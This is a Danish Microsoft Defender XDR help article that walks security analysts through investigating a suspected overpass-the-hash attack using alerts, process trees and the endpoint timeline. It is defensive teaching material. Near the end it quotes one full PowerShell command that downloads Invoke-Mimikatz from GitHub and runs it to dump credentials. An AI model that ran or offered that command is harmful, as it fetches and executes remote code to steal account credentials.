Del via

Eksempel på et identitetsbaseret angreb

  • Artikel

Gælder for:

  • Microsoft Defender XDR

Microsoft Defender for Identity kan hjælpe med at registrere skadelige forsøg på at kompromittere identiteter i din organisation. Da Defender for Identity kan integreres med Microsoft Defender XDR, kan sikkerhedsanalytikere have synlighed over trusler, der kommer ind fra Defender for Identity, f.eks. mistænkte forsøg på udvidede Netlogon-rettigheder.

Analyse af angrebet i Microsoft Defender for Identity

Microsoft Defender XDR gør det muligt for analytikere at filtrere beskeder efter registreringskilde under fanen Beskeder på hændelsessiden. I følgende eksempel filtreres registreringskilden til Defender for Identity.

Filtrering af registreringskilden i Microsoft Defender for Identity

Hvis du vælger den mistænkte overpass-the-hash angreb besked går til en side i Microsoft Defender for Cloud Apps, der viser mere detaljerede oplysninger. Du kan altid få mere at vide om en besked eller et angreb ved at vælge Få mere at vide om denne beskedtype for at læse en beskrivelse af angrebs - og afhjælpningsforslag.

En formodet overpass-the-hash angreb besked

Undersøgelse af det samme angreb i Microsoft Defender for Endpoint

En analytiker kan også bruge Defender for Endpoint til at få mere at vide om aktiviteten på et slutpunkt. Vælg hændelsen fra hændelseskøen, og vælg derefter fanen Beskeder . Herfra kan de også identificere registreringskilden. En registreringskilde, der er mærket som EDR, står for Endpoint Detection and Response, som er Defender for Endpoint. Herfra vælger analytikeren en besked, der er registreret af EDR.

Registrering og svar af slutpunkter på portalen Microsoft Defender for Endpoint

På beskedsiden vises forskellige relevante oplysninger, f.eks. det påvirkede enhedsnavn, brugernavnet, status for den automatiske undersøgelse og oplysningerne om beskeden. Beskedhistorien viser en visuel repræsentation af procestræet. Procestræet er en hierarkisk repræsentation af overordnede og underordnede processer, der er relateret til beskeden.

Et beskedprocestræ i Microsoft Defender for Endpoint

Hver proces kan udvides for at få vist flere detaljer. Detaljer, som en analytiker kan se, er de faktiske kommandoer, der blev angivet som en del af et skadeligt script, IP-adresser til udgående forbindelser og andre nyttige oplysninger.

Procesdetaljerne på Microsoft Defender for Endpoint-portalen

Ved at vælge Se på tidslinjen kan en analytiker foretage detailudledning yderligere for at bestemme det nøjagtige tidspunkt for kompromiset.

Microsoft Defender for Endpoint kan registrere mange skadelige filer og scripts. På grund af mange legitime anvendelser af udgående forbindelser, PowerShell og kommandolinjeaktivitet vil nogle aktiviteter dog blive betragtet som godartede, indtil der oprettes en skadelig fil eller aktivitet. Brug af tidslinjen hjælper derfor analytikere med at sætte beskeden i kontekst med den omgivende aktivitet for at bestemme den oprindelige kilde eller tidspunktet for det angreb, der ellers er tilsløret af almindeligt filsystem og brugeraktivitet.

Hvis du vil bruge tidslinjen, vil en analytiker starte på tidspunktet for registrering af beskeder (med rødt) og rulle bagud i tiden for at bestemme, hvornår den oprindelige aktivitet, der førte til den skadelige aktivitet, faktisk startede.

Analytikerens starttidspunkt for registrering af beskeder

Det er vigtigt at forstå og skelne mellem almindelige aktiviteter, f.eks. Windows Update forbindelser, windows-aktiveringstrafik, andre almindelige forbindelser til Microsoft-websteder, internetaktivitet fra tredjepart, Microsoft Endpoint Configuration Manager aktivitet og andre godartede aktiviteter fra mistænkelig aktivitet. En måde at skelne på er ved hjælp af tidslinjefiltre. Der er mange filtre, der kan fremhæve bestemte aktiviteter, mens du filtrerer alt, hvad analytikeren ikke vil have vist.

På billedet nedenfor filtrerede analytikeren kun for at få vist netværks- og proceshændelser. Dette filterkriterium giver analytikeren mulighed for at se netværksforbindelser og -processer omkring hændelsen, hvor Notesblok oprettede en forbindelse med en IP-adresse, som vi også så i procestræet.

Sådan blev Notesblok brugt til at oprette en skadelig udgående forbindelse

I denne særlige hændelse blev Notesblok brugt til at oprette en skadelig udgående forbindelse. Men ofte vil hackere bruge iexplorer.exe til at oprette forbindelser for at downloade en skadelig nyttedata, fordi normalt iexplorer.exe processer betragtes som almindelig webbrowseraktivitet.

Et andet element, du kan søge efter på tidslinjen, er PowerShell bruger til udgående forbindelser. Analytikeren vil søge efter vellykkede PowerShell-forbindelser med kommandoer, f.eks IEX (New-Object Net.Webclient) . efterfulgt af en udgående forbindelse til et websted, der er vært for en skadelig fil.

I følgende eksempel blev PowerShell brugt til at downloade og udføre Mimikatz fra et websted:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

En analytiker kan hurtigt søge efter nøgleord ved at skrive nøgleordet i søgelinjen for kun at få vist de hændelser, der er oprettet med PowerShell.

Næste trin

Se phishing-undersøgelsesstien .

Se også

Tip

Vil du vide mere? Kontakt Microsoft Security-community'et i vores Tech Community: Microsoft Defender XDR Tech Community.